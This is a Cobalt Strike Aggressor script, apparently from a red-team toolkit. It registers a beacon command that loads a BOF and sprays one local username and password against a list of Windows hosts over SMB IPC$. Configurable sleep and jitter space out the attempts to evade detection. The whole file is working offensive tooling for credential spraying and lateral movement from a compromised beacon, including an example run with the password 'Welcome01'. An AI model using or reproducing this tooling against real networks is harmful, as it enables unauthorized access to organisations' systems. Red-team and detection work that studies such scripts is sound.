# author Western Tactics

beacon_command_register(
	"passwordspraylocal", "Validate a single set of credentials against multiple local hosts via SMB (IPC\$).",
	"INFO:\nValidate a single local username and password against a list of target hostnames using SMB authentication.\n\n" .
	"ARGUMENTS:\n[path to hostnames file]: attacker-side path to hostname list (newline separated).\n[username]: local account username.\n[password]: password to validate.\n[sleeptimer]: (optional) seconds between attempts (default 5).\n[jitter]: (optional) jitter percentage (default 20).\n\n" .
	"USAGE:\npasswordspraylocal <path to hostnames file> <username> <password> [opt <sleeptimer>] [opt <jitter>]\n\n" .
	"EXAMPLES:\npasswordspraylocal C:/Users/redmed/Documents/computers.txt localadmin Welcome01 10 40\n\n");
	
alias passwordspraylocal {
	$bid = $1;
	$path = $2;
	$username = $3;
	$password = $4;
	$timer = $5;
	$jitter = $6;
	
	$path = strrep($path, "\\", "/");
	
	if ($path eq "" || $username eq "" || $password eq "") {
		berror($bid, "Usage: passwordspraylocal <host_file> <username> <password> [timer] [jitter]");
		return;
	}

	# Explicitly set defaults because // is not supported in Sleep
	if ($timer eq "") {
		$timer = 5;
	}
	if ($jitter eq "") {
		$jitter = 20;
	}

	$handle = openf($path);
	if ($handle is $null) { 
		berror($bid, "Could not open hostnames file: " . $path); 
		return; 
	}
	$file = readb($handle, -1);
	closef($handle);
	
	$handle = openf(script_resource("passwordspraylocal.o"));
	if ($handle is $null) { 
		berror($bid, "Could not find BOF file: passwordspraylocal.o"); 
		return; 
	}
	$data = readb($handle, -1);
	closef($handle);

	# Pack: b (file bytes), Z (wide string username), Z (wide string password), i (int timer), i (int jitter)
	$arg_data = bof_pack($bid, "bZZii", $file, $username, $password, $timer, $jitter);

	blog($bid, "Tasked local password spray for " . $username . " via SMB IPC\$.");
	beacon_inline_execute($bid, $data, "go", $arg_data);
}